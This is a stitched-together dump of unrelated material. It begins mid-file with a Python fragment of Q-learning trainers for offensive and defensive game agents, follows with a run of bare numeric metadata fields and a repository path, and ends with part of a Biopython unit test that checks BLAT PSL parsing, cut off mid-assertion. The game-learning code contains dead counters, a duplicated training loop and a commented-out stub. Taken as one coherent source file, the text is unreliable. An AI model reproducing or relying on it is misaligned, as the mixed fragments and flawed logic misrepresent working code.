self.epsilon = self.params.get("epsilon")
self.epsilon_decay = self.params.get("epsilon_decay")
def update_Q(self, state, action, reward, next_state, next_actions):
for ind, a in enumerate(next_actions):
if ind == 0:
max_nQ = self.Q[(next_state, a)]
else:
temp_Q = self.Q[(next_state, a)]
if temp_Q > max_nQ:
max_nQ = temp_Q
target = reward + self.gamma * max_nQ
self.update(state, action, target)
def train(self):
# Records all Q values
offensive_Q_list = [0 for _ in range(self.num_episodes)]
defensive_Q_list = [0 for _ in range(self.num_episodes)]
Q_list = [0 for _ in range(self.num_episodes)]
# Records the winning status
offensive_win = 0
defensive_win = 0
tie_count = 0
# Two agents
agent_off = TDAgent(self.game_name)
agent_def = TDAgent(self.game_name)
for e in range(self.num_episodes):
state = self.env.observation()
done = 0
game_round = 0
while done == 0:
game_round += 1
actions = self.env.actions(state)
action_off = agent_off.epsilon_greedy(state, actions, self.epsilon)
intermediate_state, reward_off, done, info = self.env.step(action_off)
if done: # offensive agent wins or tie
reward_def = -reward_off
agent_off.Q.update(state, action_off, intermediate_state, reward_off)
agent_def.Q.update(last_inter_state, action_def, intermediate_state, reward_def)
else: # turn of defensive agent
actions = self.env.actions(intermediate_state)
reward_def = reward_off
# Need to udpate the Q value of defensive agent after the first round
if game_round > 1:
agent_def.Q.update(last_inter_state, action_def, intermediate_state, reward_def, actions)
game_round += 1
action_def = agent_def.epsilon_greedy(intermediate_state, actions, self.epsilon)
next_state, reward_def, done, info = self.env.step(action_def)
if done: # defensive agent wins or tie
reward_off = -reward_def
agent_def.Q.update(intermediate_state, action_def, next_state, reward_def)
agent_off.Q.update(state, action_off, next_state, reward_off)
else:
actions = self.env.actions(next_state)
agent_off.Q.update(state, action_off, next_state, reward_off, actions)
last_inter_state = intermediate_state[:]
self.logger.debug(f"Offensive: state:{state}, action:{action_off}, reward:{reward_off}, next_state: {intermediate_state}")
self.logger.debug(f"Defensive: state:{intermediate_state}, action:{action_def}, reward:{reward_def}, next_state: {next_state}")
self.logger.debug(f"Offensive Q sum: {agent_off.Q.sum()}, Defensive Q sum: {agent_def.Q.sum()}")
state = next_state[:]
self.epsilon = max(self.min_epsilon, self.epsilon*self.epsilon_decay)
self.env.reset()
# Record current Q sum
offensive_Q_list[e] = agent_off.Q.sum()
defensive_Q_list[e] = agent_def.Q.sum()
Q_list[e] = offensive_Q_list[e] + defensive_Q_list[e]
trained_Q = agent_off.Q + agent_def.Q
with open(self.Q_file, "wb") as f:
pickle.dump(trained_Q, f)
with open("Q/offensive_Q_sum.json", "w") as f:
json.dump(offensive_Q_list, f)
with open("Q/defensive_Q_sum.json", "w") as f:
json.dump(defensive_Q_list, f)
with open("Q/Q_sum.json", "w") as f:
json.dump(Q_list, f)
self.logger.info(f"Offensive wins for {offensive_win} times, defensive wins for {defensive_win} times, ties for {tie_count} times")
class DoubleQLearning(DoubleTDAgent):
def __init__(self, new=False):
super().__init__(new)
self.Q1 = self.Q
self.Q2 = Q()
def update_Q(self, state, action, reward, next_state):
rnd = random.rand()
next_actions = self.env.actions(next_state)
if rnd >= 0.5:
update_Q, action_Q = self.Q1, self.Q2
else:
update_Q, action_Q = self.Q2, self.Q1
for ind, a in enumerate(next_actions):
if ind == 0:
max_nQ = action_Q[(next_state, a)]
else:
temp_nQ = action_Q[(next_state, a)]
if temp_nQ > max_nQ:
max_nQ = temp_nQ
target = reward + self.gamma * max_nQ
return self.double_update(state, action, target, update_Q)
class QLearningET(QLearning):
""" This is the Q learning with Eligibility Trace """
pass
class NStepQLearning(QLearning):
def __init__(self, game_name):
super().__init__(game_name)
def train(self):
# Records all Q values
offensive_Q_list = [0 for _ in range(self.num_episodes)]
defensive_Q_list = [0 for _ in range(self.num_episodes)]
Q_list = [0 for _ in range(self.num_episodes)]
# Records the winning status
offensive_win = 0
defensive_win = 0
tie_count = 0
# Two agents
agent_off = TDAgent(self.game_name)
agent_def = TDAgent(self.game_name)
for e in range(self.num_episodes):
state = self.env.observation()
done = 0
game_round = 0
while done == 0:
game_round += 1
actions = self.env.actions(state)
action_off = agent_off.epsilon_greedy(state, actions, self.epsilon)
intermediate_state, reward_off, done, info = self.env.step(action_off)
if done: # offensive agent wins or tie
reward_def = -reward_off
agent_off.Q.update(state, action_off, intermediate_state, reward_off)
agent_def.Q.update(last_inter_state, action_def, intermediate_state, reward_def)
else: # turn of defensive agent
actions = self.env.actions(intermediate_state)
reward_def = reward_off
# Need to udpate the Q value of defensive agent after the first round
if game_round > 1:
agent_def.Q.update(last_inter_state, action_def, intermediate_state, reward_def, actions)
game_round += 1
action_def = agent_def.epsilon_greedy(intermediate_state, actions, self.epsilon)
next_state, reward_def, done, info = self.env.step(action_def)
if done: # defensive agent wins or tie
reward_off = -reward_def
agent_def.Q.update(intermediate_state, action_def, next_state, reward_def)
agent_off.Q.update(state, action_off, next_state, reward_off)
else:
actions = self.env.actions(next_state)
agent_off.Q.update(state, action_off, next_state, reward_off, actions)
last_inter_state = intermediate_state[:]
self.logger.debug(f"Offensive: state:{state}, action:{action_off}, reward:{reward_off}, next_state: {intermediate_state}")
self.logger.debug(f"Defensive: state:{intermediate_state}, action:{action_def}, reward:{reward_def}, next_state: {next_state}")
self.logger.debug(f"Offensive Q sum: {agent_off.Q.sum()}, Defensive Q sum: {agent_def.Q.sum()}")
state = next_state[:]
self.epsilon = max(self.min_epsilon, self.epsilon*self.epsilon_decay)
self.env.reset()
# Record current Q sum
offensive_Q_list[e] = agent_off.Q.sum()
defensive_Q_list[e] = agent_def.Q.sum()
Q_list[e] = offensive_Q_list[e] + defensive_Q_list[e]
trained_Q = agent_off.Q + agent_def.Q
with open(self.Q_file, "wb") as f:
pickle.dump(trained_Q, f)
with open("Q/offensive_Q_sum.json", "w") as f:
json.dump(offensive_Q_list, f)
with open("Q/defensive_Q_sum.json", "w") as f:
json.dump(defensive_Q_list, f)
with open("Q/Q_sum.json", "w") as f:
json.dump(Q_list, f)
self.logger.info(f"Offensive wins for {offensive_win} times, defensive wins for {defensive_win} times, ties for {tie_count} times")
#class EligibilityTraceSARSA:
# def __init__(self):
# pass
#
# def train(self):
# state =
#
| 43.809955
| 143
| 0.588928
| 1,237
| 9,682
| 4.34034
| 0.107518
| 0.041907
| 0.020115
| 0.020861
| 0.845595
| 0.8225
| 0.791209
| 0.791209
| 0.791209
| 0.763271
| 0
| 0.00542
| 0.313985
| 9,682
| 220
| 144
| 44.009091
| 0.802921
| 0.062074
| 0
| 0.725714
| 0
| 0.022857
| 0.105292
| 0.015689
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0.005714
| 0.051429
| 0.005714
| 0.148571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
92c06ed141465bb3176537e7576edf7f1976c3ce
| 55,400
|
py
|
Python
|
Tests/test_SearchIO_blat_psl.py
|
adamnovak/biopython
|
92772dd6add33e0b87ab593841f924f0f6f16090
|
[
"PostgreSQL"
] | 2
|
2020-08-27T08:45:14.000Z
|
2020-11-14T02:15:32.000Z
|
Tests/test_SearchIO_blat_psl.py
|
adamnovak/biopython
|
92772dd6add33e0b87ab593841f924f0f6f16090
|
[
"PostgreSQL"
] | null | null | null |
Tests/test_SearchIO_blat_psl.py
|
adamnovak/biopython
|
92772dd6add33e0b87ab593841f924f0f6f16090
|
[
"PostgreSQL"
] | null | null | null |
# Copyright 2012 by Wibowo Arindrarto. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for SearchIO BlatIO parsers."""
import os
import unittest
from Bio import BiopythonExperimentalWarning
import warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', BiopythonExperimentalWarning)
from Bio.SearchIO import parse
# test case files are in the Blast directory
TEST_DIR = 'Blat'
FMT = 'blat-psl'
def get_file(filename):
"""Returns the path of a test file."""
return os.path.join(TEST_DIR, filename)
class BlatPslCases(unittest.TestCase):
def test_psl_34_001(self, testf='psl_34_001.psl', pslx=False):
"""Test parsing blat output (psl_34_001.psl)"""
blat_file = get_file(testf)
self.qresults = list(parse(blat_file, FMT, pslx=pslx))
self.assertEqual(2, len(self.qresults))
# check common attributes
for qresult in self.qresults:
for hit in qresult:
self.assertEqual(qresult.id, hit.query_id)
for hsp in hit:
self.assertEqual(hit.id, hsp.hit_id)
self.assertEqual(qresult.id, hsp.query_id)
# test first qresult
qresult = self.qresults[0]
self.assertEqual('hg18_dna', qresult.id)
self.assertEqual('blat', qresult.program)
self.assertEqual(33, qresult.seq_len)
self.assertEqual(3, len(qresult))
# first qresult, first hit
hit = qresult[0]
self.assertEqual('chr4', hit.id)
self.assertEqual(191154276, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual(16, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(11, hsp.query_start)
self.assertEqual(61646095, hsp.hit_start)
self.assertEqual(27, hsp.query_end)
self.assertEqual(61646111, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([16], hsp.query_span_all)
self.assertEqual([16], hsp.hit_span_all)
self.assertEqual([(11, 27)], hsp.query_range_all)
self.assertEqual([(61646095, 61646111)], hsp.hit_range_all)
# first qresult, second hit
hit = qresult[1]
self.assertEqual('chr1', hit.id)
self.assertEqual(249250621, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual(33, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(0, hsp.query_start)
self.assertEqual(10271783, hsp.hit_start)
self.assertEqual(33, hsp.query_end)
self.assertEqual(10271816, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([33], hsp.query_span_all)
self.assertEqual([33], hsp.hit_span_all)
self.assertEqual([(0, 33)], hsp.query_range_all)
self.assertEqual([(10271783, 10271816)], hsp.hit_range_all)
# first qresult, third hit
hit = qresult[2]
self.assertEqual('chr2', hit.id)
self.assertEqual(243199373, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual(17, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(8, hsp.query_start)
self.assertEqual(53575980, hsp.hit_start)
self.assertEqual(25, hsp.query_end)
self.assertEqual(53575997, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([17], hsp.query_span_all)
self.assertEqual([17], hsp.hit_span_all)
self.assertEqual([(8, 25)], hsp.query_range_all)
self.assertEqual([(53575980, 53575997)], hsp.hit_range_all)
# test second qresult
qresult = self.qresults[1]
self.assertEqual('hg19_dna', qresult.id)
self.assertEqual('blat', qresult.program)
self.assertEqual(50, qresult.seq_len)
self.assertEqual(10, len(qresult))
# second qresult, first hit
hit = qresult[0]
self.assertEqual('chr9', hit.id)
self.assertEqual(141213431, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# second qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual(38, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(9, hsp.query_start)
self.assertEqual(85737865, hsp.hit_start)
self.assertEqual(50, hsp.query_end)
self.assertEqual(85737906, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([41], hsp.query_span_all)
self.assertEqual([41], hsp.hit_span_all)
self.assertEqual([(9, 50)], hsp.query_range_all)
self.assertEqual([(85737865, 85737906)], hsp.hit_range_all)
# second qresult, second hit
hit = qresult[1]
self.assertEqual('chr8', hit.id)
self.assertEqual(146364022, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# second qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual(41, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(8, hsp.query_start)
self.assertEqual(95160479, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(95160520, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([41], hsp.query_span_all)
self.assertEqual([41], hsp.hit_span_all)
self.assertEqual([(8, 49)], hsp.query_range_all)
self.assertEqual([(95160479, 95160520)], hsp.hit_range_all)
# second qresult, third hit
hit = qresult[2]
self.assertEqual('chr22', hit.id)
self.assertEqual(51304566, hit.seq_len)
self.assertEqual(2, len(hit.hsps))
# second qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual(33, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(11, hsp.query_start)
self.assertEqual(42144400, hsp.hit_start)
self.assertEqual(47, hsp.query_end)
self.assertEqual(42144436, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([36], hsp.query_span_all)
self.assertEqual([36], hsp.hit_span_all)
self.assertEqual([(11, 47)], hsp.query_range_all)
self.assertEqual([(42144400, 42144436)], hsp.hit_range_all)
# second qresult, third hit, second hsp
hsp = qresult[2].hsps[1]
self.assertEqual(35, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(2, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(12, hsp.query_start)
self.assertEqual(48997405, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(48997442, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([37], hsp.query_span_all)
self.assertEqual([37], hsp.hit_span_all)
self.assertEqual([(12, 49)], hsp.query_range_all)
self.assertEqual([(48997405, 48997442)], hsp.hit_range_all)
# second qresult, fourth hit
hit = qresult[3]
self.assertEqual('chr2', hit.id)
self.assertEqual(243199373, hit.seq_len)
self.assertEqual(2, len(hit.hsps))
# second qresult, fourth hit, first hsp
hsp = qresult[3].hsps[0]
self.assertEqual(43, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(1, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(1, hsp.query_gapopen_num)
self.assertEqual(4, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(1, hsp.query_start)
self.assertEqual(183925984, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(183926028, hsp.hit_end)
self.assertEqual(2, len(hsp))
self.assertEqual([6, 38], hsp.query_span_all)
self.assertEqual([6, 38], hsp.hit_span_all)
self.assertEqual([(1, 7), (11, 49)], hsp.query_range_all)
self.assertEqual([(183925984, 183925990), (183925990, 183926028)], hsp.hit_range_all)
# second qresult, fourth hit, second hsp
hsp = qresult[3].hsps[1]
self.assertEqual(35, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(1, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(13, hsp.query_start)
self.assertEqual(120641740, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(120641776, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([36], hsp.query_span_all)
self.assertEqual([36], hsp.hit_span_all)
self.assertEqual([(13, 49)], hsp.query_range_all)
self.assertEqual([(120641740, 120641776)], hsp.hit_range_all)
# second qresult, fifth hit
hit = qresult[4]
self.assertEqual('chr19', hit.id)
self.assertEqual(59128983, hit.seq_len)
self.assertEqual(3, len(hit.hsps))
# second qresult, fifth hit, first hsp
hsp = qresult[4].hsps[0]
self.assertEqual(34, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(2, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(1, hsp.hit_gapopen_num)
self.assertEqual(134, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(35483340, hsp.hit_start)
self.assertEqual(46, hsp.query_end)
self.assertEqual(35483510, hsp.hit_end)
self.assertEqual(2, len(hsp))
self.assertEqual([25, 11], hsp.query_span_all)
self.assertEqual([25, 11], hsp.hit_span_all)
self.assertEqual([(10, 35), (35, 46)], hsp.query_range_all)
self.assertEqual([(35483340, 35483365), (35483499, 35483510)], hsp.hit_range_all)
# second qresult, fifth hit, second hsp
hsp = qresult[4].hsps[1]
self.assertEqual(39, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(54017130, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(54017169, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([39], hsp.query_span_all)
self.assertEqual([39], hsp.hit_span_all)
self.assertEqual([(10, 49)], hsp.query_range_all)
self.assertEqual([(54017130, 54017169)], hsp.hit_range_all)
# second qresult, fifth hit, third hsp
hsp = qresult[4].hsps[2]
self.assertEqual(36, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(10, hsp.query_start)
self.assertEqual(553742, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(553781, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([39], hsp.query_span_all)
self.assertEqual([39], hsp.hit_span_all)
self.assertEqual([(10, 49)], hsp.query_range_all)
self.assertEqual([(553742, 553781)], hsp.hit_range_all)
def test_psl_34_002(self, testf='psl_34_002.psl', pslx=False):
"""Test parsing blat output (psl_34_001.psl)"""
blat_file = get_file(testf)
self.qresults = list(parse(blat_file, FMT, pslx=pslx))
self.assertEqual(0, len(self.qresults))
def test_psl_34_003(self, testf='psl_34_003.psl', pslx=False):
"""Test parsing blat output (psl_34_003.psl)"""
blat_file = get_file(testf)
self.qresults = list(parse(blat_file, FMT, pslx=pslx))
self.assertEqual(1, len(self.qresults))
# check common attributes
for qresult in self.qresults:
for hit in qresult:
self.assertEqual(qresult.id, hit.query_id)
for hsp in hit:
self.assertEqual(hit.id, hsp.hit_id)
self.assertEqual(qresult.id, hsp.query_id)
# test first qresult
qresult = self.qresults[0]
self.assertEqual('hg18_dna', qresult.id)
self.assertEqual('blat', qresult.program)
self.assertEqual(33, qresult.seq_len)
self.assertEqual(3, len(qresult))
# first qresult, first hit
hit = qresult[0]
self.assertEqual('chr4', hit.id)
self.assertEqual(191154276, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual(16, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(11, hsp.query_start)
self.assertEqual(61646095, hsp.hit_start)
self.assertEqual(27, hsp.query_end)
self.assertEqual(61646111, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([16], hsp.query_span_all)
self.assertEqual([16], hsp.hit_span_all)
self.assertEqual([(11, 27)], hsp.query_range_all)
self.assertEqual([(61646095, 61646111)], hsp.hit_range_all)
# first qresult, second hit
hit = qresult[1]
self.assertEqual('chr1', hit.id)
self.assertEqual(249250621, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual(33, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(0, hsp.query_start)
self.assertEqual(10271783, hsp.hit_start)
self.assertEqual(33, hsp.query_end)
self.assertEqual(10271816, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([33], hsp.query_span_all)
self.assertEqual([33], hsp.hit_span_all)
self.assertEqual([(0, 33)], hsp.query_range_all)
self.assertEqual([(10271783, 10271816)], hsp.hit_range_all)
# first qresult, third hit
hit = qresult[2]
self.assertEqual('chr2', hit.id)
self.assertEqual(243199373, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual(17, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(8, hsp.query_start)
self.assertEqual(53575980, hsp.hit_start)
self.assertEqual(25, hsp.query_end)
self.assertEqual(53575997, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([17], hsp.query_span_all)
self.assertEqual([17], hsp.hit_span_all)
self.assertEqual([(8, 25)], hsp.query_range_all)
self.assertEqual([(53575980, 53575997)], hsp.hit_range_all)
def test_psl_34_004(self, testf='psl_34_004.psl', pslx=False):
"""Test parsing blat output (psl_34_004.psl)"""
blat_file = get_file(testf)
self.qresults = list(parse(blat_file, FMT, pslx=pslx))
self.assertEqual(1, len(self.qresults))
# check common attributes
for qresult in self.qresults:
for hit in qresult:
self.assertEqual(qresult.id, hit.query_id)
for hsp in hit:
self.assertEqual(hit.id, hsp.hit_id)
self.assertEqual(qresult.id, hsp.query_id)
# test first qresult
qresult = self.qresults[0]
self.assertEqual('hg19_dna', qresult.id)
self.assertEqual('blat', qresult.program)
self.assertEqual(50, qresult.seq_len)
self.assertEqual(10, len(qresult))
# first qresult, first hit
hit = qresult[0]
self.assertEqual('chr9', hit.id)
self.assertEqual(141213431, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, first hit, first hsp
hsp = qresult[0].hsps[0]
self.assertEqual(38, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(9, hsp.query_start)
self.assertEqual(85737865, hsp.hit_start)
self.assertEqual(50, hsp.query_end)
self.assertEqual(85737906, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([41], hsp.query_span_all)
self.assertEqual([41], hsp.hit_span_all)
self.assertEqual([(9, 50)], hsp.query_range_all)
self.assertEqual([(85737865, 85737906)], hsp.hit_range_all)
# first qresult, second hit
hit = qresult[1]
self.assertEqual('chr8', hit.id)
self.assertEqual(146364022, hit.seq_len)
self.assertEqual(1, len(hit.hsps))
# first qresult, second hit, first hsp
hsp = qresult[1].hsps[0]
self.assertEqual(41, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(0, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(8, hsp.query_start)
self.assertEqual(95160479, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(95160520, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([41], hsp.query_span_all)
self.assertEqual([41], hsp.hit_span_all)
self.assertEqual([(8, 49)], hsp.query_range_all)
self.assertEqual([(95160479, 95160520)], hsp.hit_range_all)
# first qresult, third hit
hit = qresult[2]
self.assertEqual('chr22', hit.id)
self.assertEqual(51304566, hit.seq_len)
self.assertEqual(2, len(hit.hsps))
# first qresult, third hit, first hsp
hsp = qresult[2].hsps[0]
self.assertEqual(33, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(3, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(11, hsp.query_start)
self.assertEqual(42144400, hsp.hit_start)
self.assertEqual(47, hsp.query_end)
self.assertEqual(42144436, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([36], hsp.query_span_all)
self.assertEqual([36], hsp.hit_span_all)
self.assertEqual([(11, 47)], hsp.query_range_all)
self.assertEqual([(42144400, 42144436)], hsp.hit_range_all)
# first qresult, third hit, second hsp
hsp = qresult[2].hsps[1]
self.assertEqual(35, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(2, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(0, hsp.query_gapopen_num)
self.assertEqual(0, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(-1, hsp[0].query_strand)
self.assertEqual(12, hsp.query_start)
self.assertEqual(48997405, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
self.assertEqual(48997442, hsp.hit_end)
self.assertEqual(1, len(hsp))
self.assertEqual([37], hsp.query_span_all)
self.assertEqual([37], hsp.hit_span_all)
self.assertEqual([(12, 49)], hsp.query_range_all)
self.assertEqual([(48997405, 48997442)], hsp.hit_range_all)
# first qresult, fourth hit
hit = qresult[3]
self.assertEqual('chr2', hit.id)
self.assertEqual(243199373, hit.seq_len)
self.assertEqual(2, len(hit.hsps))
# first qresult, fourth hit, first hsp
hsp = qresult[3].hsps[0]
self.assertEqual(43, hsp.match_num)
self.assertEqual(0, hsp.match_rep_num)
self.assertEqual(1, hsp.mismatch_num)
self.assertEqual(0, hsp.n_num)
self.assertEqual(1, hsp.query_gapopen_num)
self.assertEqual(4, hsp.query_gap_num)
self.assertEqual(0, hsp.hit_gapopen_num)
self.assertEqual(0, hsp.hit_gap_num)
self.assertEqual(1, hsp[0].query_strand)
self.assertEqual(1, hsp.query_start)
self.assertEqual(183925984, hsp.hit_start)
self.assertEqual(49, hsp.query_end)
